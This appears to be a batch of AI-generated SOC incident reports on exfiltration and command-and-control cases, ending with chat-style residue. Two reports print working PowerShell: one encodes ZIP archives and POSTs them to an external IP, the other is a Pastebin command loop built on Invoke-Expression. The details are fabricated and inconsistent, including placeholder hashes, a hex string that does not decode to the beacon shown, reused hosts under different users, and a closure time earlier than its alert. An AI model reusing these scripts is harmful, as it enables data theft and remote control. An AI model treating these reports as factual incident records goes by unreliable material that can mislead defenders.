Closure Rationale: Data exfiltrated; exfiltration stopped; account secured; breach response initiated.
Analyst: [Your Name], SOC Analyst Date: 2024-02-29 17:30 EST
110. T1132 – Data Encoding (Zeek Detection)
Zeek Alert Details
Alert ID: ZEEK-DATA-ENCODING-1132-7842 Alert Time: 2024-02-29 10:30:22 EST Severity: HIGH (85/100) Source: Zeek (Bro) Network Security Monitor Rule: “Base64-Encoded Data in HTTP Requests – Potential Data Exfiltration” MITRE ATT&CK: T1132.001 – Data Encoding: Standard Encoding
Alert Details:
Detection: HTTP traffic containing large amounts of base64-encoded data
Source: 192.168.45.78 (ENG-WS-045 – Engineering) Destination: 185.143.221[.]89:80 Time: 10:15-10:30 EST
HTTP Requests:
10:15:22 – POST /upload.php (data length: 12,847 bytes, base64)
10:18:45 – POST /upload.php (data length: 14,231 bytes, base64)
10:22:12 – POST /upload.php (data length: 11,984 bytes, base64)
10:25:38 – POST /upload.php (data length: 13,562 bytes, base64)
10:28:55 – POST /upload.php (data length: 12,456 bytes, base64)
Data Analysis (Zeek extracted):
POST /upload.php HTTP/1.1
Host: 185.143.221[.]89
Content-Type: application/x-www-form-urlencoded
Content-Length: 12847
data=UEsDBBQAAAAIAICIF1Yj…
Decoded Data (base64):
5 ZIP archives
Each contains multiple files (documents, spreadsheets)
Total decoded size: ~45 MB
Detection Logic:
Multiple HTTP POST requests with large base64 payloads
Base64 encoding of binary data (ZIP files)
Destination IP known malicious
Pattern matches data encoding/exfiltration
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Zeek alert
Zeek Logs, Splunk
Confirmed base64-encoded exfiltration
2. Process Investigation
Identify process on endpoint
CrowdStrike Falcon
PowerShell script encoding and sending files
3. Data Analysis
Decode and analyze exfiltrated data
Base64 decoder, ZIP unpacker
45 MB of stolen documents (engineering IP)
4. Immediate Action
Isolate host
CrowdStrike
ENG-WS-045 quarantined
5. C2 Blocking
Block destination IP
Palo Alto
185.143.221[.]89 blocked
6. Data Protection
Determine what was stolen
File Audit Logs
47 files exfiltrated (source code, designs)
Jira Incident Report
Ticket: SOC-2024-150 Summary: T1132 – Data Exfiltration Using Base64 Encoding Status: RESOLVED Resolution: MALICIOUS – Data Exfiltrated, Host Isolated Priority: P2 – MEDIUM Labels: T1132, data-encoding, base64, exfiltration, zeek, compromised-account Components: Network-Security, Data-Protection
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Zeek Network Security Monitor.
Alert: “Base64-Encoded Data in HTTP Requests – Potential Data Exfiltration”.
Source: ENG-WS-045 (Engineering, user rpatel).
Destination: 185.143.221[.]89:80.
Protocol: HTTP with base64-encoded payloads.
Time: 2024-02-29 10:30 EST.
Technique: MITRE ATT&CK T1132.001 – Data Encoding: Standard Encoding.
2. Technical Analysis:
Attack Chain:
09:30 – rpatel account compromised (phishing)
09:45 – Attacker logs into ENG-WS-045 via RDP
09:50 – Attacker collects sensitive files
09:55-10:10 – Attacker creates 5 ZIP archives
10:15-10:30 – Attacker exfiltrates via HTTP POST with base64 encoding
10:30 – Zeek detects
Encoding Technique:
Method: Base64 encoding of ZIP files
Purpose: Hide binary data in text-based protocol (HTTP)
Evasion: Bypass DLP that doesn’t inspect HTTP POST bodies
Volume: 5 POSTs, total 45 MB of original data
Exfiltrated Data:
Source code (Python, C++) – 12 files
Engineering designs (CAD) – 8 files
Project documentation – 15 files
Customer lists – 5 files
Password database – 1 file
VPN configurations – 6 files
Total: 47 files, 45 MB
Exfiltration Tool:
Process: powershell.exe
Script:
$files = Get-ChildItem C:\temp\data\*.zip
foreach ($file in $files) {
$bytes = [System.IO.File]::ReadAllBytes($file.FullName)
$b64 = [System.Convert]::ToBase64String($bytes)
$body = @{data=$b64} | ConvertTo-Json
Invoke-WebRequest -Uri http://185.143.221[.]89/upload.php -Method POST -Body $body
}
3. Investigation Findings:
Timeline:
09:30 – Account compromised
09:45 – Attacker logs in
09:50-10:10 – Data collection and archiving
10:15-10:30 – Exfiltration
10:30 – Zeek alert
10:32 – SOC investigates
10:33 – Host isolated
10:34 – C2 blocked
Indicators of Compromise (IoCs):
Network:
– Destination: 185.143.221[.]89:80
– URI: /upload.php
– Pattern: HTTP POST with large base64 data
Files:
– C:\temp\data\*.zip (5 files, 45 MB total)
Account:
– rpatel (compromised)
4. Containment Actions:
Immediate Actions:
Isolated ENG-WS-045 via CrowdStrike.
Blocked destination IP at firewall.
Terminated exfiltration process.
Disabled rpatel account.
Reset password.
Data Protection:
Determined scope of exfiltrated data (47 files, 45 MB).
Notified affected data owners.
Initiated incident response for data breach.
Host Remediation:
Reimaged host.
5. Root Cause Analysis:
Primary Cause: User account compromised, leading to data theft.
Contributing Factors:
No MFA on account.
RDP allowed from internet.
DLP did not inspect HTTP POST bodies.
6. Business Impact:
Operational Impact: Engineering host offline.
Data Exposure: 45 MB of sensitive IP (source code, designs, customer data) exfiltrated.
Regulatory Impact: Potential GDPR breach (customer data).
7. Remediation & Prevention:
Completed Actions:
Exfiltration stopped.
Host isolated.
Account secured.
Technical Controls Enhanced:
Enforced MFA for all users.
Moved RDP behind VPN only.
Implemented DLP inspection of HTTP POST bodies.
Enhanced Zeek signatures for base64 detection.
8. Conclusion:
An attacker compromised an engineering account and exfiltrated 45 MB of intellectual property using base64 encoding over HTTP. Zeek detected the encoded data pattern, but exfiltration had already occurred. The host was isolated and the account secured.
Closure Rationale: Data exfiltrated; exfiltration stopped; account secured; breach response initiated.
Analyst: [Your Name], SOC Analyst Date: 2024-02-29 11:30 EST
End of Batch 22
Ready for your next batch of prompts whenever you are.
Batch 23: Command and Control & Exfiltration Incident Reports
Here are the next 5 detailed SOC incident reports.
111. T1001 – Data Obfuscation (FortiSandbox Detection)
FortiSandbox Alert Details
Alert ID: FORTI-OBFUSCATION-1001-7842 Alert Time: 2024-03-01 09:30:15 EST Severity: HIGH (88/100) Source: Fortinet FortiSandbox Rule: “XOR-Encrypted Data in Network Traffic” MITRE ATT&CK: T1001.002 – Data Obfuscation: Steganography
Alert Details:
File Analysis Report:
File Name: invoice_7842.pdf.exe (submitted from email quarantine)
File Size: 1.8 MB
SHA256: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4
Source: Email attachment to finance@company.com
Submission Time: 09:15 EST
Sandbox Behavior Analysis:
File executed in sandbox environment
Established network connection to 185.143.221[.]89:443
Traffic analysis revealed XOR-encrypted data stream
Network Traffic Analysis:
Raw Traffic:
47 6f 74 20 61 20 63 6f 66 66 65 65 20 66 72 6f 6d 20 74 68 65 20 73 74 6f 72 65 2e
XOR Key: 0x42 (detected) Decrypted Data:
GET /beacon HTTP/1.1
Host: 185.143.221[.]89
User-Agent: Mozilla/5.0
Cookie: session=7a8b9c0d1e2f3a4b
Additional Findings:
File also contained steganographic image (PNG) with hidden payload
Payload extracted from image: Cobalt Strike beacon
XOR used to obfuscate C2 traffic
Detection Logic:
XOR encryption detected in network traffic (unusual)
Steganography in image file (hidden data)
Multiple obfuscation layers
Pattern matches advanced malware
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify FortiSandbox analysis
FortiSandbox Console
Confirmed XOR obfuscation and steganography
2. Email Investigation
Find source email
Proofpoint, Exchange
Email to finance@company.com from spoofed vendor
3. Quarantine Email
Block and remove email
Proofpoint
Email quarantined from all mailboxes
4. User Check
Verify if user executed file
CrowdStrike
User did not open attachment (alert before execution)
5. IOC Distribution
Block URLs and IPs
Palo Alto, Cisco Umbrella
C2 IP and domain added to blocklists
6. Threat Hunting
Check for similar files
FortiSandbox, Splunk
No other occurrences found
Jira Incident Report
Ticket: SOC-2024-151 Summary: T1001 – XOR-Obfuscated C2 Traffic with Steganography Status: RESOLVED Resolution: MALICIOUS – Blocked Before Execution Priority: P2 – MEDIUM Labels: T1001, data-obfuscation, xor, steganography, fortisandbox, phishing Components: Email-Security, Malware-Analysis
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Fortinet FortiSandbox.
Alert: “XOR-Encrypted Data in Network Traffic”.
File: invoice_7842.pdf.exe (email attachment).
Target: Finance Department.
Time: 2024-03-01 09:30 EST.
Technique: MITRE ATT&CK T1001.002 – Data Obfuscation: Steganography.
2. Technical Analysis:
Attack Chain:
09:10 – Email sent from “vendor@payment-update[.]net”
09:11 – Email delivered to finance@company.com
09:12 – FortiSandbox analyzes attachment (inline)
09:15 – Analysis begins
09:20 – XOR obfuscation detected
09:25 – Steganography identified
09:30 – Alert triggers
09:31 – Email quarantined
Obfuscation Techniques:
Layer 1: File masquerades as PDF (double extension)
Layer 2: Embedded image with steganography
Layer 3: XOR encryption (key 0x42) of C2 traffic
Layer 4: Base64 encoding within image metadata
Steganography Details:
Image: innocent-looking PNG of coffee cup
Hidden Data: Cobalt Strike beacon in image pixels
Extraction Method: LSB (Least Significant Bit) encoding
Payload Size: 256 KB hidden in image
C2 Communication:
Server: 185.143.221[.]89:443
Protocol: HTTPS with XOR-encrypted content
Beacon Interval: 60 seconds
3. Investigation Findings:
Timeline:
09:10 – Email sent
09:11 – Email delivered
09:12-09:30 – FortiSandbox analysis
09:30 – Alert triggers
09:31 – Email quarantined
09:32 – SOC investigates
09:35 – User confirmed (no execution)
Indicators of Compromise (IoCs):
File:
– invoice_7842.pdf.exe (SHA256: a1b2c3d4…)
Network:
– C2: 185.143.221[.]89:443
– XOR key: 0x42
Email:
– Sender: vendor@payment-update[.]net
– Subject: “Invoice #7842 – Overdue Payment”
4. Containment Actions:
Immediate Actions:
Quarantined email from all mailboxes.
Blocked C2 IP at firewall and proxy.
Added file hash to blocklists.
User Notification:
Finance team alerted to campaign.
No user action needed (email not opened).
Email Rule Update:
Created Proofpoint rule to block .exe attachments.
Enhanced filtering for invoice-themed emails.
5. Root Cause Analysis:
Primary Cause: External attacker sending sophisticated malware via email.
Contributing Factors:
.exe attachments allowed (now blocked).
No user execution (prevented by sandbox).
6. Business Impact:
Operational Impact: None.
Data Exposure: None (email not opened).
Financial Impact: None.
7. Remediation & Prevention:
Completed Actions:
Email quarantined.
IOCs blocked.
Users notified.
Technical Controls Enhanced:
Blocked all .exe attachments via email gateway.
Enabled FortiSandbox inline analysis for all emails.
Created alert for XOR-encrypted traffic.
Enhanced steganography detection.
8. Conclusion:
A sophisticated malware used multiple obfuscation techniques including XOR encryption and steganography to hide its C2 traffic and payload. FortiSandbox detected the obfuscation and enabled blocking before any user could open the email.
Closure Rationale: Malware blocked; IOCs added; email policy updated.
Analyst: [Your Name], SOC Analyst Date: 2024-03-01 10:30 EST
112. T1102 – Web Service (Zscaler Detection)
Zscaler Alert Details
Alert ID: ZSCALER-WEB-SERVICE-1102-7842 Alert Time: 2024-03-01 14:15:33 EST Severity: HIGH (85/100) Source: Zscaler Internet Access (ZIA) Rule: “C2 Communication via Legitimate Web Service – Pastebin” MITRE ATT&CK: T1102.002 – Web Service: Bidirectional Communication
Alert Details:
Detection: Internal host communicating with Pastebin in anomalous pattern
User: alexchen@company.com (Alex Chen, Engineer) Source IP: 192.168.45.78 (ENG-WS-045) Destination: https://pastebin.com/api/api_post.php Time: 14:00-14:15 EST
API Calls:
14:00:22 – POST to /api/api_post.php (data: “session=7a8b9c0d&cmd=whoami”)
14:02:45 – GET from /raw/AbCdEfGh (response: “user=engineering\alexchen”)
14:05:12 – POST to /api/api_post.php (data: “session=7a8b9c0d&cmd=dir C:”)
14:07:38 – GET from /raw/XyZ12345 (response: directory listing)
14:10:15 – POST to /api/api_post.php (data: “session=7a8b9c0d&cmd=exit”)
14:12:30 – GET from /raw/AbCdEfGh (response: “ok”)
Detection Logic:
Pastebin is legitimate service (used for code sharing)
Unusual pattern: POST then GET cycles (command and response)
Content contains system commands (whoami, dir)
User alexchen has no history of using Pastebin for work
Pattern matches C2 using legitimate web service
Threat Intelligence:
Pastebin abused by multiple malware families for C2
Commands encoded in API calls
Responses stored as raw pastes
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Zscaler alert
Zscaler Admin Console
Confirmed Pastebin C2 pattern
2. Process Investigation
Identify process on endpoint
CrowdStrike Falcon
powershell.exe making Pastebin API calls
3. Script Analysis
Extract PowerShell script
CrowdStrike Live Response
Script using Pastebin for C2 communication
4. Immediate Action
Isolate host
CrowdStrike
ENG-WS-045 quarantined
5. C2 Blocking
Block Pastebin API access
Zscaler, Palo Alto
Pastebin API restricted (allowlist only)
6. Malware Removal
Clean infected host
CrowdStrike Live Response
PowerShell script removed; host reimaged
Jira Incident Report
Ticket: SOC-2024-152 Summary: T1102 – C2 Communication via Pastebin API Status: RESOLVED Resolution: MALICIOUS – C2 Channel Disrupted Priority: P2 – MEDIUM Labels: T1102, web-service, pastebin, c2, zscaler, compromised-account Components: Network-Security, Endpoint-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Zscaler Internet Access.
Alert: “C2 Communication via Legitimate Web Service – Pastebin”.
User: alexchen@company.com (Engineering Department).
Host: ENG-WS-045.
Service: Pastebin API.
Time: 2024-03-01 14:15 EST.
Technique: MITRE ATT&CK T1102.002 – Web Service: Bidirectional Communication.
2. Technical Analysis:
Attack Chain:
13:30 – alexchen account compromised via phishing
13:45 – Attacker logs into ENG-WS-045 via RDP
13:50 – Attacker deploys PowerShell script using Pastebin for C2
14:00-14:12 – C2 communication via Pastebin API
14:15 – Zscaler detects
C2 Mechanism:
POST to API: Send commands to C2 (encoded in paste content)
GET from raw: Retrieve command responses
Paste IDs: Generated dynamically (AbCdEfGh, XyZ12345)
Frequency: Commands every 2-3 minutes
PowerShell Script:
$c2 = “https://pastebin.com/api/api_post.php”
$api_key = “your_api_key_here”
while($true) {
# Check for commands
$cmd_paste = Invoke-RestMethod -Uri “https://pastebin.com/raw/AbCdEfGh”
if ($cmd_paste -ne $last_cmd) {
$result = Invoke-Expression $cmd_paste 2>&1 | Out-String
$encoded = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($result))
$body = @{
api_option = “paste”
api_user_key = “”
api_paste_private = “2”
api_paste_name = “response”
api_paste_code = $encoded
api_dev_key = $api_key
}
Invoke-RestMethod -Uri $c2 -Method POST -Body $body
$last_cmd = $cmd_paste
}
Start-Sleep -Seconds 120
}
Commands Executed:
whoami (discovered user)
dir C:\ (listed files)
ipconfig (network info)
netstat (connections)
exit (terminated)
3. Investigation Findings:
Timeline:
13:30 – Account compromised
13:45 – Attacker logs in
13:50 – Script deployed
14:00-14:12 – C2 communication
14:15 – Zscaler alert
14:17 – SOC investigates
14:18 – Host isolated
14:20 – Pastebin API blocked
Indicators of Compromise (IoCs):
Network:
– Pastebin API (api_post.php)
– Paste IDs: AbCdEfGh, XyZ12345 (now expired)
Host:
– C:\Users\alexchen\c2.ps1 (SHA256: a1b2c3d4…)
Account:
– alexchen (compromised)
4. Containment Actions:
Immediate Actions:
Isolated ENG-WS-045 via CrowdStrike.
Blocked Pastebin API access via Zscaler (allowlist only).
Deleted PowerShell script.
Disabled alexchen account.
Reset password.
Host Remediation:
Reimaged host.
User Remediation:
MFA enforced.
5. Root Cause Analysis:
Primary Cause: User account compromised, leading to malware deployment using legitimate web service.
Contributing Factors:
No MFA on account.
RDP allowed from internet.
Pastebin allowed (abused for C2).
6. Business Impact:
Operational Impact: Engineering host offline for 2 hours.
Data Exposure: System information only (no sensitive data).
7. Remediation & Prevention:
Completed Actions:
C2 channel disrupted.
Malware removed.
Account secured.
Technical Controls Enhanced:
Enforced MFA for all users.
Moved RDP behind VPN only.
Restricted Pastebin API to approved users only.
Enhanced monitoring for web service abuse.
8. Conclusion:
An attacker used a compromised engineering account to deploy a PowerShell script that used Pastebin API for C2 communication, evading detection by using a legitimate service. Zscaler detected the anomalous pattern and enabled rapid containment.
Closure Rationale: C2 disrupted; malware removed; account secured.
Analyst: [Your Name], SOC Analyst Date: 2024-03-01 15:30 EST
113. T1219 – Remote Access Software (Microsoft Defender Detection)
Microsoft Defender Alert Details
Alert ID: MD-REMOTE-ACCESS-1219-7842 Alert Time: 2024-03-01 11:30:22 EST Severity: HIGH (85/100) Source: Microsoft Defender for Endpoint Rule: “Unauthorized Remote Access Software Installed” MITRE ATT&CK: T1219 – Remote Access Software
Alert Details:
Detection: Unauthorized remote access software (AnyDesk) installed and running
Host: FIN-WS-078 (Finance Workstation) User: bturner@company.com (Brian Turner, Accountant) Time: 11:15-11:30 EST
Software Details:
Name: AnyDesk
Version: 7.0.14
Install Path: C:\Users\bturner\AppData\Local\AnyDesk\
Executable: AnyDesk.exe (PID: 4789)
Install Time: 11:10 EST
Installation Source: Downloaded from suspicious URL
Configuration:
Unattended access enabled
Password set: “Finance2024!”
Auto-start enabled (registry Run key added)
Firewall exception added
Network Connections:
11:12 – Connection to anydesk.com (legitimate) – authentication
11:13 – Connection to 185.143.221[.]89:443 (suspicious)
11:15-11:30 – Active remote session from external IP
Detection Logic:
AnyDesk installed without IT approval
Unattended access enabled (allows remote control without consent)
Connection to known malicious IP during session
User bturner has no legitimate need for remote access software
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Defender alert
Microsoft 365 Defender
Confirmed unauthorized AnyDesk installation
2. Process Investigation
Identify AnyDesk process
CrowdStrike Falcon
AnyDesk running with active remote session
3. User Interview
Contact bturner
Teams, Phone
User did NOT install AnyDesk (account compromised)
4. Immediate Action
Terminate AnyDesk process
CrowdStrike
Process killed
5. Software Removal
Uninstall AnyDesk
CrowdStrike Live Response
AnyDesk removed; registry keys cleaned
6. Account Remediation
Disable bturner account
Azure AD, AD
Account disabled; password reset
Jira Incident Report
Ticket: SOC-2024-153 Summary: T1219 – Unauthorized AnyDesk Installation for Remote Access Status: RESOLVED Resolution: MALICIOUS – Remote Access Terminated Priority: P2 – MEDIUM Labels: T1219, remote-access-software, anydesk, defender, compromised-account Components: Endpoint-Security, Application-Control
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Microsoft Defender for Endpoint.
Alert: “Unauthorized Remote Access Software Installed”.
Host: FIN-WS-078 (Finance Department, user bturner).
Software: AnyDesk (remote access tool).
Time: 2024-03-01 11:30 EST.
Technique: MITRE ATT&CK T1219 – Remote Access Software.
2. Technical Analysis:
Attack Chain:
10:30 – bturner account compromised via phishing
10:45 – Attacker logs into FIN-WS-078 via RDP
10:50 – Attacker downloads AnyDesk installer
11:00 – AnyDesk installed with unattended access
11:05 – AnyDesk configured to phone home
11:10-11:30 – Active remote session
11:30 – Defender detects
AnyDesk Configuration:
Unattended Access: Enabled (allows remote control without user interaction)
Password: Finance2024! (known to attacker)
Auto-start: Registry Run key added
Firewall: Exception added to allow inbound connections
Remote Session Activity:
11:10-11:30 – Attacker connected remotely
Viewed financial documents (3 files)
Attempted to access banking portal (failed – MFA required)
Downloaded 2 files locally (staged)
No exfiltration detected
User Status:
Account compromised; user unaware
3. Investigation Findings:
Timeline:
10:30 – Account compromised
10:45 – Attacker logs in
10:50-11:00 – AnyDesk installed
11:10-11:30 – Remote session
11:30 – Defender alert
11:32 – SOC investigates
11:33 – AnyDesk terminated
11:34 – Software removed
Indicators of Compromise (IoCs):
Software:
– AnyDesk 7.0.14 (unauthorized)
– Unattended access enabled
Network:
– anydesk.com (legitimate, used for auth)
– 185.143.221[.]89:443 (suspicious)
Account:
– bturner (compromised)
4. Containment Actions:
Immediate Actions:
Terminated AnyDesk process.
Uninstalled AnyDesk.
Removed registry Run key.
Removed firewall exception.
Disabled bturner account.
Reset password.
Host Remediation:
Full scan (clean).
Reimaged as precaution.
User Remediation:
MFA enforced.
5. Root Cause Analysis:
Primary Cause: User account compromised, allowing attacker to install remote access tool.
Contributing Factors:
No MFA on account.
RDP allowed from internet.
No application control blocking unauthorized software.
6. Business Impact:
Operational Impact: Finance user offline for 2 hours.
Data Exposure: 3 financial documents viewed; 2 staged locally.
7. Remediation & Prevention:
Completed Actions:
Remote access terminated.
Software removed.
Account secured.
Technical Controls Enhanced:
Enforced MFA for all users.
Moved RDP behind VPN only.
Implemented application control (block unauthorized remote access tools).
Enhanced monitoring for remote access software installation.
8. Conclusion:
An attacker compromised a finance user’s account and installed AnyDesk with unattended access, establishing a remote session to view financial documents. Defender detected the unauthorized software and enabled rapid termination of the remote access.
Closure Rationale: Remote access terminated; software removed; account secured.
Analyst: [Your Name], SOC Analyst Date: 2024-03-01 12:30 EST
114. T1568 – Dynamic Resolution (Cisco Umbrella Detection)
Cisco Umbrella Alert Details
Alert ID: UMBRELLA-DYNAMIC-RES-1568-7842 Alert Time: 2024-03-01 16:30:45 EST Severity: HIGH (88/100) Source: Cisco Umbrella Investigate Rule: “Fast-Flux DNS – Malware C2 Detection” MITRE ATT&CK: T1568.001 – Dynamic Resolution: Fast Flux DNS
Alert Details:
Detection: Domain using fast-flux DNS (multiple IPs) with malicious reputation
Domain: cdn-update-service[.]com First Seen: 2024-03-01 10:00 EST Query Source: Multiple internal hosts (12 hosts)
DNS Resolution History:
10:00:15 – 185.143.221.89 (Bulgaria)
10:05:22 – 194.165.16.78 (Romania)
10:10:18 – 203.0.113.45 (Netherlands)
10:15:33 – 45.134.225.12 (Russia)
10:20:47 – 89.248.165.67 (Ukraine)
(changing every 5-10 minutes)
Internal Hosts Querying:
ENG-WS-045 (engineering) – 12 queries
FIN-WS-078 (finance) – 8 queries
HR-WS-023 (hr) – 5 queries
MKT-WS-112 (marketing) – 4 queries
(12 total hosts, 47 queries)
Detection Logic:
Domain resolves to multiple IPs (fast-flux)
IPs across multiple countries (unusual)
Domain age: 2 days (newly registered)
Multiple internal hosts querying (potential widespread compromise)
Pattern matches malware C2 using fast-flux
Threat Intelligence:
Domain associated with “QakBot” malware family
Fast-flux used to evade IP blocking
47 queries from internal network
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Umbrella alert
Cisco Umbrella Dashboard
Confirmed fast-flux domain with multiple internal queries
2. Host Investigation
Identify hosts querying domain
CrowdStrike Falcon
12 hosts with Cobalt Strike beacons
3. Malware Analysis
Extract beacon samples
CrowdStrike Sandbox
QakBot malware using fast-flux C2
4. Immediate Action
Isolate all affected hosts
CrowdStrike
12 hosts quarantined
5. C2 Blocking
Block domain and IPs
Umbrella, Palo Alto
Domain and all associated IPs blocked
6. Malware Removal
Clean all affected hosts
CrowdStrike Live Response
Beacons removed; hosts reimaged
Jira Incident Report
Ticket: SOC-2024-154 Summary: T1568 – Fast-Flux C2 Domain Affecting 12 Hosts Status: RESOLVED Resolution: MALICIOUS – C2 Disrupted, Hosts Cleaned Priority: P1 – CRITICAL Labels: T1568, dynamic-resolution, fast-flux, qakbot, cisco-umbrella, widespread Components: Network-Security, Endpoint-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Cisco Umbrella Investigate.
Alert: “Fast-Flux DNS – Malware C2 Detection”.
Domain: cdn-update-service[.]com.
Queries: 47 queries from 12 internal hosts.
Time: 2024-03-01 16:30 EST.
Technique: MITRE ATT&CK T1568.001 – Dynamic Resolution: Fast Flux DNS.
2. Technical Analysis:
Fast-Flux Details:
Domain: cdn-update-service[.]com (registered 2024-02-28)
IPs: 6 different IPs across 5 countries
TTL: 300 seconds (5 minutes)
Flux Rate: IP changes every 5-10 minutes
Affected Hosts (12):
Engineering: 3 hosts (ENG-WS-045, 046, 047)
Finance: 2 hosts (FIN-WS-078, 079)
HR: 2 hosts (HR-WS-023, 024)
Marketing: 2 hosts (MKT-WS-112, 113)
Sales: 3 hosts (SALES-WS-023, 024, 025)
Malware Analysis:
Type: QakBot banking trojan
C2: cdn-update-service[.]com
Beacon Interval: 5 minutes
Capabilities: Credential theft, keylogging, remote access
Common Infection Vector:
All 12 users clicked phishing email with same attachment
Email subject: “Invoice Overdue”
Attachment: invoice_7842.docm (macro-enabled)
3. Investigation Findings:
Timeline:
09:00 – Phishing emails sent
09:15-10:00 – Users clicked attachments
10:00-16:00 – Beacons active, fast-flux DNS
16:30 – Umbrella alert
16:32 – SOC investigates
16:35 – All 12 hosts identified
16:40 – Hosts isolated
16:45 – Domain blocked
Indicators of Compromise (IoCs):
Domain:
– cdn-update-service[.]com (blocked)
IPs:
– 185.143.221.89, 194.165.16.78, 203.0.113.45, 45.134.225.12, 89.248.165.67
File:
– invoice_7842.docm (SHA256: a1b2c3d4…)
Hosts:
– 12 compromised workstations (list attached)
4. Containment Actions:
Immediate Actions:
Isolated all 12 affected hosts via CrowdStrike.
Blocked domain and all associated IPs at firewall and Umbrella.
Terminated beacon processes on all hosts.
Host Remediation:
All 12 hosts reimaged.
User passwords reset.
MFA enforced for all.
Email Remediation:
Quarantined phishing email from all mailboxes.
Blocked sender domain.
5. Root Cause Analysis:
Primary Cause: Widespread phishing campaign with macro-enabled documents.
Contributing Factors:
Macros enabled in Office.
No ASR rule blocking Office child processes.
Users lacked recent training.
6. Business Impact:
Operational Impact: 12 workstations offline for 4 hours.
Data Exposure: Potential credential theft; investigation ongoing.
Productivity Impact: Significant across multiple departments.
7. Remediation & Prevention:
Completed Actions:
C2 disrupted.
12 hosts cleaned.
Passwords reset.
MFA enforced.
Technical Controls Enhanced:
Enabled ASR rule “Block Office applications from creating child processes”.
Blocked macros from internet via GPO.
Enhanced email filtering for invoice-themed emails.
Deployed additional security awareness training.
8. Conclusion:
A widespread phishing campaign infected 12 hosts with QakBot malware using fast-flux DNS to evade IP blocking. Cisco Umbrella detected the fast-flux pattern and enabled rapid identification and isolation of all affected hosts before significant data loss.
Closure Rationale: C2 disrupted; all hosts cleaned; passwords reset.
Analyst: [Your Name], SOC Analyst Date: 2024-03-01 17:30 EST
115. T1041 – Exfiltration Over C2 Channel (Palo Alto Detection)
Palo Alto Alert Details
Alert ID: PAN-EXFIL-C2-1041-7842 Alert Time: 2024-03-01 10:30:22 EST Severity: CRITICAL (95/100) Source: Palo Alto Networks Firewall + WildFire Rule: “Data Exfiltration Detected over Established C2 Channel” MITRE ATT&CK: T1041 – Exfiltration Over C2 Channel
Alert Details:
Detection: Large data transfer over previously established C2 connection
Source: 192.168.45.78 (ENG-WS-045 – Engineering) Destination: 185.143.221[.]89:443 Time: 10:15-10:30 EST
Connection History:
09:00: First C2 beacon (established)
09:00-10:15: Periodic beacons (every 5 minutes, <1KB each)
10:15-10:30: Large data transfer (47 MB in 15 minutes)
Traffic Analysis:
09:00:15 – POST /beacon (124 bytes) – C2 check-in
09:05:22 – POST /beacon (118 bytes) – C2 check-in
09:10:18 – POST /beacon (132 bytes) – C2 check-in
…
10:15:33 – POST /upload (12.3 MB) – data exfiltration
10:20:47 – POST /upload (11.8 MB) – data exfiltration
10:25:52 – POST /upload (12.1 MB) – data exfiltration
10:28:15 – POST /upload (10.8 MB) – data exfiltration
Data Analysis (WildFire sandbox):
Files exfiltrated: source code archives, design documents
Total: 47 MB in 4 uploads
Encrypted with C2 session key
Detection Logic:
Baseline C2 traffic: small beacons (<1KB) Anomaly: 47 MB transfer in 15 minutes Same destination IP as C2 Pattern matches exfiltration over existing C2 channel SOC Investigation Process Step Action Tools Used Findings 1. Alert Validation Verify Palo Alto alert Panorama Logs Confirmed exfiltration over C2 channel 2. Process Investigation Identify process on endpoint CrowdStrike Falcon Cobalt Strike beacon exfiltrating data 3. Data Analysis Determine what was stolen File Audit Logs, EDR 47 MB of source code and designs exfiltrated 4. Immediate Action Isolate host CrowdStrike ENG-WS-045 quarantined 5. C2 Blocking Block destination IP Palo Alto 185.143.221[.]89 blocked 6. Incident Response Activate breach response Legal, PR, Management Data breach declared
Jira Incident Report
Ticket: SOC-2024-155 Summary: T1041 – 47 MB of Intellectual Property Exfiltrated Over C2 Channel Status: RESOLVED Resolution: MALICIOUS – Data Breach Confirmed Priority: P1 – CRITICAL Labels: T1041, exfiltration, c2-channel, cobalt-strike, palo-alto, data-breach Components: Network-Security, Data-Protection, Incident-Response
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Palo Alto Networks Firewall + WildFire.
Alert: “Data Exfiltration Detected over Established C2 Channel”.
Source: ENG-WS-045 (Engineering, user alexchen).
Destination: 185.143.221[.]89:443.
Data: 47 MB exfiltrated.
Time: 2024-03-01 10:30 EST.
Technique: MITRE ATT&CK T1041 – Exfiltration Over C2 Channel.
2. Technical Analysis:
Attack Chain:
08:30 – alexchen account compromised via phishing
08:45 – Attacker logs into ENG-WS-045 via RDP
08:50 – Cobalt Strike beacon deployed
09:00-10:15 – Beaconing (small traffic)
10:00 – Attacker collects sensitive files
10:15-10:30 – Data exfiltration
10:30 – Palo Alto detects
Exfiltrated Data (47 MB):
Source Code: ProjectX (12 MB) – proprietary algorithms
Design Documents: CAD files (15 MB) – product designs
Customer Data: CSV files (8 MB) – PII
Financial Reports: Q4 projections (5 MB)
VPN Configurations: (2 MB) – network access
Password Database: KeePass (5 MB) – all corporate passwords
Exfiltration Method:
C2 Channel: HTTPS POST to same C2 used for beacons
Encryption: Session key from C2 handshake
Chunking: Data split into 4 uploads (10-12 MB each)
Timing: 15 minutes total
Attacker Activity:
Collected data from multiple locations
Created archives before exfiltration
Used existing C2 channel to avoid new connections
3. Investigation Findings:
Timeline:
08:30 – Account compromised
08:45 – Attacker logs in
08:50 – Beacon deployed
09:00-10:15 – Beaconing
10:00-10:15 – Data collection
10:15-10:30 – Exfiltration
10:30 – Palo Alto alert
10:32 – SOC investigates
10:33 – Host isolated
10:34 – C2 blocked
Indicators of Compromise (IoCs):
Network:
– C2: 185.143.221[.]89:443
– Beacon pattern: small traffic then large uploads
Data:
– 47 MB exfiltrated (source code, designs, customer data, passwords)
Account:
– alexchen (compromised)
4. Containment Actions:
Immediate Actions:
Isolated ENG-WS-045 via CrowdStrike.
Blocked C2 IP at firewall.
Terminated beacon process.
Disabled alexchen account.
Reset password.
Breach Response:
Declared data breach.
Notified legal, PR, management.
Began customer notification process (for PII exposure).
